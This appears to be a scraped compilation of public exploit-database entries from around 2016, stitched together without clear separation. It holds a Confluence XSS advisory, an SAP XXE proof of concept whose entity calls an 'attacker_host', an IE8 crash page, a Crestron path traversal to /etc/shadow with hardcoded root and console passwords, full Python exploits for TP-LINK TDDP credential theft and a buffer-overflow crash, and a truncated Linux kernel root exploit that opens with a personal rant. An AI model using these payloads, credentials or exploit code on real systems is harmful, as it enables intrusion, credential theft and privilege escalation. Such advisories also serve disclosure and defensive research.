Vendor URL:     www.appfusions.com
Type:           Cross-site Scripting [CWE-79]
Date found:     29/06/2016
Date published: 20/11/2016
CVSSv3 Score:   6.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)
CVE:            -


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
AppFusions Doxygen for Atlassian Confluence v1.3.3
AppFusions Doxygen for Atlassian Confluence v1.3.2 
AppFusions Doxygen for Atlassian Confluence v1.3.1
AppFusions Doxygen for Atlassian Confluence v1.3.0
older versions may be affected too.


4. INTRODUCTION
===============
With Doxygen in Confluence, you can embed full-structure code documentation:
-Doxygen blueprint in Confluence to allow Doxygen archive imports
-Display documentation from annotated sources such as Java (i.e., JavaDoc), 
 C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and UNO/OpenOffice 
 flavors), Fortran, VHDL, Tcl, D in Confluence.
-Navigation supports code structure (classes, hierarchies, files), element 
 dependencies, inheritance and collaboration diagrams.
-Search documentation from within Confluence
-Restrict access to who can see/add what
-Doxygen in JIRA also available

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The application offers the functionality to import Doxygen documentations via a file upload to make them available in a Confluence page, but does not properly validate the file format/the contents of the uploaded Doxygen file. Since the uploaded file is basically a zipped archive, it is possible to store any type of file in it like an HTML file containing arbitrary script.

In DoxygenFileServlet.java (lines 82-105) the "file" GET parameter is read
and used as part of a File object:

private void renderContent(HttpServletRequest request, HttpServletResponse response) throws IOException {
    String pathInfo = request.getPathInfo();
    String[] pathInfoParts = pathInfo.split("file/");
    String requestedFile = pathInfoParts[1];
    File homeDirectory = this.applicationProperties.getHomeDirectory();
    String doxygenDir = homeDirectory.getAbsolutePath() + File.separator + "doxygen";
    File file = new File(doxygenDir, requestedFile);
    String contentType = this.getServletContext().getMimeType(file.getName());
    if (contentType == null) {
        contentType = "application/octet-stream";
    }
    response.setContentType(contentType);
    FileInputStream inputStream = null;
    ServletOutputStream outputStream = null;
    try {
        inputStream = new FileInputStream(file);
        outputStream = response.getOutputStream();
        IOUtils.copy((InputStream)inputStream, (OutputStream)outputStream);
    }
    finally {
        IOUtils.closeQuietly((InputStream)inputStream);
        IOUtils.closeQuietly((OutputStream)outputStream);
    }
}



6. RISK
=======
To successfully exploit this vulnerability, the attacker must be authenticated and must have the rights within Atlassian Confluence to upload
Doxygen files (default).

The vulnerability allows remote attackers to permanently embed arbitrary script code into the context of an Atlassian Confluence page, which offers a wide range of possible attacks such as redirecting users to arbitrary pages, present phishing content or attacking the browser and its components of a user visiting the page.

7. POC
===========

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40817.zip

8. SOLUTION
===========
Update to AppFusions Doxygen for Atlassian Confluence v1.3.4


9. REPORT TIMELINE (DD/MM/YYYY)
===============================
23/08/2016: Discovery of the vulnerability
23/08/2016: Sent preliminary advisory incl. PoC to known mail address
30/08/2016: No response, sent out another notification
30/08/2016: Vendor response, team is working on it
20/10/2016: Vendor releases v1.3.4 which fixes this vulnerability
20/11/2016: Advisory released


9. REFERENCES
=============
https://bugs.rcesecurity.com/redmine/issues/13
HireHackking 
Application:	SAP NetWeaver AS JAVA
Versions Affected:	SAP NetWeaver AS JAVA 7.5
Vendor URL:	SAP
Bugs:	XXE
Reported:	09.03.2016
Vendor response:	10.03.2016
Date of Public Advisory:	09.08.2016
Reference:	SAP Security Note 2296909
Author:	Vahagn Vardanyan (ERPScan)

1. ADVISORY INFORMATION

Title:  [ERPSCAN-16-034] SAP NetWeaver AS JAVA – XXE vulnerability in BC-BMT-BPM-DSK component
Advisory ID:[ERPSCAN-16-034]
Risk: high
Advisory URL: https://erpscan.com/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/
Date published: 11.11.2016
Vendors contacted: SAP


2. VULNERABILITY INFORMATION

Class: XXE
Impact: Denial of Service, Read File
Remotely Exploitable: yes
Locally Exploitable: no

CVSS Information

CVSS Base Score v3:    6.4 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) Low (L)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C : Impact to Confidentiality Low (L)
I : Impact to Integrity Low (L)
A : Impact to Availability High (H)


3. VULNERABILITY DESCRIPTION

1) It is possible, that an attacker can perform a DoS attack (for example, an XML Entity expansion attack)

2) An SMB Relay attack is a type of man-in-the-middle attack where an attacker asks a victim to authenticate to a machine controlled by the
attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways, giving him access.


4. VULNERABLE PACKAGES

BPEM PORTAL CONTENT 7.20
BPEM PORTAL CONTENT 7.30
BPEM PORTAL CONTENT 7.31
BPEM PORTAL CONTENT 7.40
BPEM PORTAL CONTENT 7.50


5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note  2296909


6. AUTHOR

 Vahagn Vardanyan (ERPScan)


7. TECHNICAL DESCRIPTION

PoC


POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1

Content-Type: text/xml

User-Agent: ERPscan

Host: SAP_IP:SAP_PORT

Content-Length: 480

Connection: Keep-Alive

Cache-Control: no-cache

Authorization: Basic ZXJwc2NhbjplcnBzY2Fu


<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host">
]><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">

   <SOAP-ENV:Body>

       <m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>

   &xxe;</SOAP-ENV:Body>

</SOAP-ENV:Envelope>


8. REPORT TIMELINE

Sent:  09.03.2016
Reported: 10.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 09.08.2016


9. REFERENCES

https://erpscan.com/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/
HireHackking 
<!--
Source: http://blog.skylined.nl/20161121001.html

Synopsis

A specially crafted web-page can cause an unknown type of memory corruption in Microsoft Internet Explorer 8. This vulnerability can cause the Ptls5::Ls­Find­Span­Visual­Boundaries method (or other methods called by it) to access arbitrary memory.

Known affected software, attack vectors and mitigations

Microsoft Internet Explorer 8

An attacker would need to get a target user to open a specially crafted web-page. Java­Script is not necessarily required to trigger the issue.

Description

The memory corruption causes the Ptls5::Ls­Find­Span­Visual­Boundaries method to access data at seemingly random addresses. However, these addresses appear to always be in the same range as valid heap addresses, even if they are often not DWORD aligned. The reason for the memory corruption is not immediately obvious.

Repro.html
-->

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
  <body>
    <button>
      <pre>
        <x>
          <sub>
            <ruby>
              <img height="1"/>
            </ruby>
          </sub>
        </x>
      </pre>
    </button>
  </body>
</html>

<!--
Time-line

July 2014: This vulnerability was found through fuzzing.
November 2016: Details of this issue are released.
-->
HireHackking 
=================================================================
# Crestron AM-100 (Multiple Vulnerabilities)
=================================================================
# Date: 2016-08-01
# Exploit Author: Zach Lanier
# Vendor Homepage: https://www.crestron.com/products/model/am-100
# Version: v1.1.1.11 - v1.2.1
# CVE: CVE-2016-5639 
# References: 
#   https://medium.com/@benichmt1/an-unwanted-wireless-guest-9433383b1673#.78tu9divi
#   https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md

Description:
The Crestron AirMedia AM-100 with firmware versions v1.1.1.11 - v1.2.1 is vulnerable to multiple issues.

1) Path Traversal

GET request: 
http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&src=../../../../../../../../../../../../../../../../../../../../etc/shadow

2) Hidden Management Console

http://[AM-100-ADDRESS]/cgi-bin/login_rdtool.cgi
The AM-100 has a hardcoded default credential of rdtool::mistral5885
This interface contains the ability to upload arbitrary files (RD upload) and can enable a telnet server that runs on port 5885 (RD Debug mode).

3) Hardcoded credentials

The default root password for these devices is root::awind5885
Valid login sessions for the default (non-debugging) management interface are stored on the filesystem as session01, session02.. etc. Cleartext credentials can be read directly from these files.
HireHackking 
1. Advisory Information

Title: TP-LINK TDDP Multiple Vulnerabilities
Advisory ID: CORE-2016-0007
Advisory URL: http://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities
Date published: 2016-11-21
Date of last update: 2016-11-18
Vendors contacted: TP-Link
Release mode: User release

2. Vulnerability Information

Class: Missing Authentication for Critical Function [CWE-306], Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') [CWE-120]
Impact: Code execution, Information leak
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2

3. Vulnerability Description

TP-LINK [1] ships some of their devices with a debugging protocol activated by default. This debugging protocol is listening on the 1040 UDP port on the LAN interface.

Vulnerabilities were found in the implementation of this protocol, that could lead to remote code execution and information leak (credentials acquisition).

4. Vulnerable Devices

TP-LINK WA5210g. (Firmware v1 and v2 are vulnerable)
Other devices might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

No workarounds are available for this device.

6. Credits

This vulnerability was discovered and researched by Andres Lopez Luksenberg from Core Security Exploit Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.

7. Technical Description / Proof of Concept Code

TP-LINK distributes some of their hardware with a debugging service activate by default. This program uses a custom protocol. Vulnerabilities were found using this protocol, that could lead to remote code execution or information leak.

7.1. Missing Authentication for TDDP v1

[CVE-pending-assignment-1] If version 1 is selected when communicating with the TDDP service, there is a lack of authentication in place. Additionally if the message handler accepts the "Get configuration" message type, this will result in the program leaking the web interface configuration file, which includes the web login credentials.

The following is a proof of concept to demonstrate the vulnerability (Impacket [2] is required for the PoC to work):

 
import socket
import re
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct

class TDDP(Structure):
    structure = (
       ('version','B=0x1'),
       ('type','B=0'),      
       ('code','B=0'),
       ('replyInfo','B=0'),
       ('packetLength','>L=0'),
       ('pktID','<H=1'),
       ('subType','B=0'),
       ('reserved','B=0'),
       ('payload',':=""'),       
    )
    def printPayload(self):
        print self.getPayloadAsString()
   
    def getPayloadAsString(self):
        s=''
        for i in range(len(self['payload'])):
            s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
        return s


class TDDPRequestsPacketBuilder(object):
    SET_CONFIG = 1
    GET_CONFIG = 2
    CMD_SYS0_PR = 3
    GET_SERIAL_NUMBER = 5
   
    GET_PRODUCT_ID = 10   
   
    def getRequestPacket(self):
        tddp = TDDP()
        tddp['version'] = 1
        tddp['replyInfo'] = 1       
        return tddp
   
    def getConfigPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + 'all'
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def setConfigPacket(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.SET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + trail
        tddp['packetLength'] = len(tddp['payload'])
        return tddp
       
    def getSerialNumberPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_SERIAL_NUMBER
        return tddp

    def getProductIDPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_PRODUCT_ID
        return tddp
   
    def CMD_SYS0_PR_Packet(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.CMD_SYS0_PR
        tddp['replyInfo'] = 2
        tddp['payload'] = ('\x00'*0x10)
        tddp['packetLength'] = len(tddp['payload'])
        tddp['payload'] += trail
        return tddp
       

class TPLINKConfig(object):
    def __init__(self, aConfig):
        self.__parseConfig(aConfig)
       
    def __sanitizeKeyValue(self, k, v):
        k = k.replace("\r", "")
        k = k.replace("\n", "")
       
        v = v.replace("\r", "")
        v = v.replace("\n", "")
       
        return k,v
       
    def __parseConfig(self, aConfig):
        self.__key_order = []
        self.Header = aConfig[:0x10]
        pending = aConfig[0x10:]
        k_v = re.findall("(.*?) (.*)", pending)
       
        for k, v in k_v:
            k,v = self.__sanitizeKeyValue(k,v)
            real_value = v.split(" ")
            if len(real_value) == 1:
                real_value = real_value[0]
               
            self.__dict__[k] = real_value
            self.__key_order.append(k)
           
    def __str__(self):
        cfg = []
        cfg.append(self.Header)
       
        for k in self.__key_order:
            value = self.__dict__[k]

            if not isinstance(value, basestring):
                str_value = " ".join(value)
            else:
                str_value = value
           
            line = "%s %s" % (k, str_value)
           
            cfg.append(line)
       
       
        str_cfg =  "\r\n".join(cfg)
       
        return str_cfg
       
class TDDPSessionV1(object):
    def __init__(self, ip, port=1040):
        self.ip = ip
        self.port = port
        self.req_buidler = TDDPRequestsPacketBuilder()

    def send(self, aPacket):
        self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.conn.sendto(str(aPacket), (self.ip, self.port))
        self.conn.close()
       
    def recv(self, n):
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp.bind(('', 61000))
        data, addr = udp.recvfrom(n)
        return TDDP(data)
   
    def _send_and_recv(self, packet, n):
        self.send(packet)
        return self.recv(n)
   
    #####################################
    def getConfig(self):
        c_packet = self.req_buidler.getConfigPacket()
        return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])
       
    def getSerialNumber(self):
        c_packet = self.req_buidler.getSerialNumberPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()
       
    def getProductID(self):
        c_packet = self.req_buidler.getProductIDPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()
       
    def setInitState(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
        return self._send_and_recv(c_packet, 50000)
       
    def save(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
        self._send_and_recv(c_packet, 50000)
       
    def reboot(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
        self._send_and_recv(c_packet, 50000)

    def clr_dos(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
        self._send_and_recv(c_packet, 50000)
       
    def setConfig(self, aConfig):
        c_packet = self.req_buidler.setConfigPacket(str(aConfig))
        self._send_and_recv(c_packet, 50000)
 
HOST = "192.168.1.254"

s = TDDPSessionV1(HOST)
config = s.getConfig()
print "user: ", config.lgn_usr
print "pass: ", config.lgn_pwd


 
7.2. Buffer Overflow in TDDP v1 protocol

[CVE-pending-assignment-2] A buffer overflow vulnerability was found when sending a handcrafted "set configuration" message to the TDDP service with an extensive configuration file and forcing version 1 in the packet.

The following is a proof of concept to demonstrate the vulnerability by crashing the TDDP service (Impacket [2] is required for the PoC to work). To reestablish the TDDP service the device must be restarted:

 
import socket
import re
import string 
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct


class TDDP(Structure):
    structure = (
       ('version','B=0x1'),
       ('type','B=0'),      
       ('code','B=0'),
       ('replyInfo','B=0'),
       ('packetLength','>L=0'),
       ('pktID','<H=1'),
       ('subType','B=0'),
       ('reserved','B=0'),
       ('payload',':=""'),   
    )
    def printPayload(self):
        print self.getPayloadAsString()
   
    def getPayloadAsString(self):
        s=''
        for i in range(len(self['payload'])):
            s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
        return s
        
        
class TDDPRequestsPacketBuilder(object):
    SET_CONFIG = 1
    GET_CONFIG = 2
    CMD_SYS0_PR = 3
    GET_SERIAL_NUMBER = 5
   
    GET_PRODUCT_ID = 10   
   
    def getRequestPacket(self):
        tddp = TDDP()
        tddp['version'] = 1
        tddp['replyInfo'] = 1       
        return tddp
   
    def getConfigPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + 'all'
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def setConfigPacket(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.SET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + trail
        tddp['packetLength'] = len(tddp['payload'])
        return tddp
       
    def getSerialNumberPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_SERIAL_NUMBER
        return tddp

    def getProductIDPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_PRODUCT_ID
        return tddp
   
    def CMD_SYS0_PR_Packet(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.CMD_SYS0_PR
        tddp['replyInfo'] = 2
        tddp['payload'] = ('\x00'*0x10)
        tddp['packetLength'] = len(tddp['payload'])
        tddp['payload'] += trail
        return tddp
       
       
class TPLINKConfig(object):
    def __init__(self, aConfig):
        self.__parseConfig(aConfig)
       
    def __sanitizeKeyValue(self, k, v):
        k = k.replace("\r", "")
        k = k.replace("\n", "")
       
        v = v.replace("\r", "")
        v = v.replace("\n", "")
       
        return k,v
       
    def __parseConfig(self, aConfig):
        self.__key_order = []
        self.Header = aConfig[:0x10]
        pending = aConfig[0x10:]
        k_v = re.findall("(.*?) (.*)", pending)
       
        for k, v in k_v:
            k,v = self.__sanitizeKeyValue(k,v)
            real_value = v.split(" ")
            if len(real_value) == 1:
                real_value = real_value[0]
               
            self.__dict__[k] = real_value
            self.__key_order.append(k)
           
    def __str__(self):
        cfg = []
        cfg.append(self.Header)
       
        for k in self.__key_order:
            value = self.__dict__[k]

            if not isinstance(value, basestring):
                str_value = " ".join(value)
            else:
                str_value = value
           
            line = "%s %s" % (k, str_value)
           
            cfg.append(line)
       
       
        str_cfg =  "\r\n".join(cfg)
       
        return str_cfg
        
        
class TDDPSessionV1(object):
    def __init__(self, ip, port=1040):
        self.ip = ip
        self.port = port
        self.req_buidler = TDDPRequestsPacketBuilder()

    def send(self, aPacket):
        self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.conn.sendto(str(aPacket), (self.ip, self.port))
        self.conn.close()
        
    def recv(self, n):
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp.bind(('', 61000))
        data, addr = udp.recvfrom(n)
        return TDDP(data)
    
    def _send_and_recv(self, packet, n):
        self.send(packet)
        return self.recv(n)
    
    #####################################
    def getConfig(self):
        c_packet = self.req_buidler.getConfigPacket()
        return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])
        
    def getSerialNumber(self):
        c_packet = self.req_buidler.getSerialNumberPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()
        
    def getProductID(self):
        c_packet = self.req_buidler.getProductIDPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()
        
    def setInitState(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
        return self._send_and_recv(c_packet, 50000)
        
    def save(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
        self._send_and_recv(c_packet, 50000)
        
    def reboot(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
        self._send_and_recv(c_packet, 50000)

    def clr_dos(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
        self._send_and_recv(c_packet, 50000)
        
    def setConfig(self, aConfig):
        c_packet = self.req_buidler.setConfigPacket(str(aConfig))
        self._send_and_recv(c_packet, 50000)
        
        
class Exploit(TDDPSessionV1):
    def run(self):
        c_packet = self.req_buidler.getRequestPacket()
        c_packet['type'] = self.req_buidler.SET_CONFIG        
        c_packet['payload'] = "A"*325
        c_packet['packetLength'] = 0x0264           
        return self.send(c_packet)

HOST = "192.168.1.254"
PORT = 1040		
s = Exploit(HOST)
s.run()
	  
 
8. Report Timeline

2016-10-04: Core Security sent an initial notification to TP-Link.
2016-10-07: Core Security sent a second notification to TP-Link.
2016-10-31: Core Security sent a third notification to TP-Link through Twitter.
2016-11-09: Core Security sent a fourth notification to TP-Link through email and Twitter without receiving any response whatsoever.
2016-11-10: Core Security sent a request to Mitre for two CVE ID's for this advisory.
2016-11-12: Mitre replied that the vulnerabilities didn't affected products that were in the scope for CVE.
2016-11-21: Advisory CORE-2016-0007 published.
9. References

[1] http://www.tplink.com/. 
[2] https://www.coresecurity.com/corelabs-research/open-source-tools/impacket. 

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company's strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security's analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2016 Core Security and (c) 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
HireHackking 
/* exp_moosecox.c
   Watch a video of the exploit here:
   http://www.youtube.com/watch?v=jt81NvaOj5Y

   developed entirely by Ingo Molnar (exploit writer extraordinaire!) , 
   thanks to Fotis Loukos for pointing the bug out to me -- neat bug! :)

   dedicated to the Red Hat employees who get paid to copy+paste my 
   twitter and issue security advisories, their sweet 
   acknowledgement policy, and general classiness
   see: https://bugzilla.redhat.com/show_activity.cgi?id=530490

   "policy" aside, there's a word for what you guys are doing: "plagiarism"
   in fact, i tested this one day by posting three links to twitter,
   without any discussion on any of them.  the same day, those three
   (and only those three) links were assigned CVEs, even though two of 
   them weren't even security bugs (it doesn't pay to copy+paste)

   official Ingo Molnar (that's me) policy for acknowledgement in 
   exploits requires general douche-ness or plagiarization
   official policy further dictates immediate exploit release for
   embargoed, patched bug

   I'll be curious to see what the CVE statistics are like for the 
   kernel this year when they get compiled next year -- I'm predicting 
   that when someone's watching the sleepy watchers, a more personal 
   interest is taken in doing the job that you're paid to do correctly.

   --------------------------------------------------------------------

   Special PS note to Theo (I can do this here because I know he'll 
   never read it -- the guy is apparently oblivious to the entire world of 
   security around him -- the same world that invents the protections 
   years before him that he pats himself on the back for "innovating")
   Seriously though, it's incredible to me that an entire team 
   of developers whose sole purpose is to develop a secure operating 
   system can be so oblivious to the rest of the world.  They haven't 
   innovated since they replaced exploitable string copies with 
   exploitable string truncations 6 or so years ago.

   The entire joke of a thread can be read here:
   http://www.pubbs.net/openbsd/200911/4582/
   "Our focus therefore is always on finding innovative ideas which make 
    bugs very hard to exploit succesfully."
   "He's too busy watching monkey porn instead of
    building researching last-year's security technology that will stop 
    an exploit technique that has been exploited multiple times."
   "it seems that everyone else is slowly coming around to the
    same solution."

   So let's talk about this "innovation" of theirs with their 
   implementation of mmap_min_addr:

   They implemented it in 2008, a year after Linux implemented it, a 
   year after the public phrack article on the bug class, more than a 
   year after my mail to dailydave with the first public Linux kernel 
   exploit for the bug class, and over two years after UDEREF was 
   implemented in PaX (providing complete protection against the smaller 
   subset of null ptr dereference bugs and the larger class of invalid 
   userland access in general).

   OpenBSD had a public null pointer dereference exploit (agp_ioctl()) 
   published for its OS in January of 2007.  It took them over a year 
   and a half to implement the same feature that was implemented in 
   Linux a few months after my public exploit in 2007.

   So how can it be that "everyone else is slowly coming around to the 
   same solution"  when "everyone else" came to that solution over a 
   year before you Theo?  In fact, I prediced this exact situation would 
   happen back in 2007 in my DD post:
   http://lists.virus.org/dailydave-0703/msg00011.html
   "Expect OpenBSD to independently invent a protection against null ptr 
    deref bugs sometime in 2009."

   Let's talk about some more "innovation" -- position independent 
   executables.  PaX implemented position independent executables on 
   Linux back in 2001 (ET_DYN).  PIE binary support was added to GNU 
   binutils in 2003.  Those OpenBSD innovators implemented PIE binaries 
   in 2008, 7 years after PaX.  Innovation indeed!

   How about their W^X/ASLR innovation?  These plagiarists have the 
   audacity to announce on their press page:
   http://www.openbsd.org/press.html
   "Microsoft borrows one of OpenBSD's security features for Vista, 
    stack/library randomization, under the name Address Space Layout 
    Randomization (ASLR).  "Until now, the feature has been most 
    prominently used in the OpenBSD Unix variant and the PaX and Exec 
    Shield security patches for Linux""
   Borrowing one of your features?  Where'd this ASLR acronym come from 
   anyway?  Oh that's right, PaX again -- when they published the first 
   design and implementation of it, and coined the term, in July 2001.
   It covered the heap, mmap, and stack areas.
   OpenBSD implemented "stack-gap randomization" in 2003.  Way to 
   innovate!

   W^X, which is a horrible name as OpenBSD doesn't even enforce it with 
   mprotect restrictions like PaX did from the beginning or even SELinux 
   is doing now (from a 3rd party contribution modeled after PaX): 
   PaX implemented true per-page non-executable page support, protecting 
   binary data, the heap, and the stack, back in 2000.
   OpenBSD implemented it in 2003, requiring a full userland rebuild.
   The innovation is overwhelming!

   They keep coming up with the same exact "innovations" others came up 
   with years before them.  Their official explanation for where they 
   got the W^X/ASLR ideas was a drunk guy came into their tent at one of 
   their hack-a-thons and started talking about the idea.  They had 
   never heard of PaX when we asked them in 2003.  Which makes the 
   following involuntarily contributed private ICB logs from Phrack #66
   (Internet Citizen's Band -- OpenBSD internal chat network) so intriguing:

   On some sunny day in July 2002 (t: Theo de Raadt):
   <cloder> why can't you just randomize the base
   <cloder> that's what PaX does
   <t> You've not been paying attention to what art's saying, or you don't 
    understand yet, either case is one of think it through yourself.
   <cloder> whatever

   Only to see poetic justice in August 2003 (ttt: Theo again):

   <miod> more exactly, we heard of pax when they started bitching
   <ttt> miod, that was very well spoken.

   That wraps up our OpenBSD history lesson, in case anyone forgot it.
   PS -- enjoy that null ptr deref exploit just released for OpenBSD.

   --------------------------------------------------------------------

   Important final exploit notes:

   don't forget to inspect /boot/config* to see if PREEMPT, LOCKBREAK,
   or DEBUG_SPINLOCK are enabled and modify the structures below 
   accordingly -- a fancier exploit would do this automatically

   I've broken the 2.4->2.6.10 version of the exploit and would like to see 
   someone fix it ;)  See below for more comments on this.
*/

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sched.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include "exp_framework.h"

int pipefd[2];
struct exploit_state *exp_state;
int is_old_kernel = 0;

int go_go_speed_racer(void *unused)
{
    int ret;

        while(!exp_state->got_ring0) {
        /* bust spinlock */
        *(unsigned int *)NULL = is_old_kernel ? 0 : 1;
                ret = pipe(pipefd);
        if (!ret) {
                    close(pipefd[0]);
                    close(pipefd[1]);
        }
        }

    return 0;
}

/* <3 twiz/sgrakkyu */
int start_thread(int (*f)(void *), void *arg)
{
        char *stack = malloc(0x4000);
        int tid = clone(f, stack + 0x4000 - sizeof(unsigned long), CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg);
        if (tid < 0) {
                printf("can't create thread\n");
                exit(1);
        }
    sleep(1);
        return tid;
}

char *desc = "MooseCox: Linux <= 2.6.31.5 pipe local root";
char *cve = "CVE-2009-3547";

#define PIPE_BUFFERS 16

/* this changes on older kernels, but it doesn't matter to our method */
struct pipe_buf_operations {
    int can_merge;
    void *map;
    void *unmap;
    void *confirm;
    void *release;
    void *steal;
    void *get;
};

struct pipe_buffer2620ornewer {
    void *page;
    unsigned int offset, len;
    void *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buffer2619orolder {
    void *page;
    unsigned int offset, len;
    void *ops;
    unsigned int flags;
};

struct pipe_buffer2616orolder {
    void *page;
    unsigned int offset, len;
    void *ops;
};

struct pipe_inode_info2620ornewer {
    unsigned int spinlock;
    /*
    // LOCKBREAK
    unsigned int break_lock;
    // DEBUG_SPINLOCK
    unsigned int magic, owner_cpu;
    void *owner;
    */
    void *next, *prev;
    unsigned int nrbufs, curbuf;
    void *tmp_page;
    unsigned int readers;
    unsigned int writers;
    unsigned int waiting_writers;
    unsigned int r_counter;
    unsigned int w_counter;
    void *fasync_readers;
    void *fasync_writers;
    void *inode;
    struct pipe_buffer2620ornewer bufs[PIPE_BUFFERS];
};

struct pipe_inode_info2619orolder {
    unsigned int spinlock;
    /*
    // if PREEMPT enabled
    unsigned int break_lock;
    // DEBUG_SPINLOCK
    unsigned int magic, owner_cpu;
    void *owner;
    */
    void *next, *prev;
    unsigned int nrbufs, curbuf;
    struct pipe_buffer2619orolder bufs[PIPE_BUFFERS];
    void *tmp_page;
    unsigned int start;
    unsigned int readers;
    unsigned int writers;
    unsigned int waiting_writers;
    unsigned int r_counter;
    unsigned int w_counter;
    void *fasync_readers;
    void *fasync_writers;
    void *inode;
};

struct pipe_inode_info2616orolder {
    unsigned int spinlock;
    /*
    // if PREEMPT enabled
    unsigned int break_lock;
    // DEBUG_SPINLOCK
    unsigned int magic, owner_cpu;
    */
    void *owner;
    void *next, *prev;
    unsigned int nrbufs, curbuf;
    struct pipe_buffer2616orolder bufs[PIPE_BUFFERS];
    void *tmp_page;
    unsigned int start;
    unsigned int readers;
    unsigned int writers;
    unsigned int waiting_writers;
    unsigned int r_counter;
    unsigned int w_counter;
    void *fasync_readers;
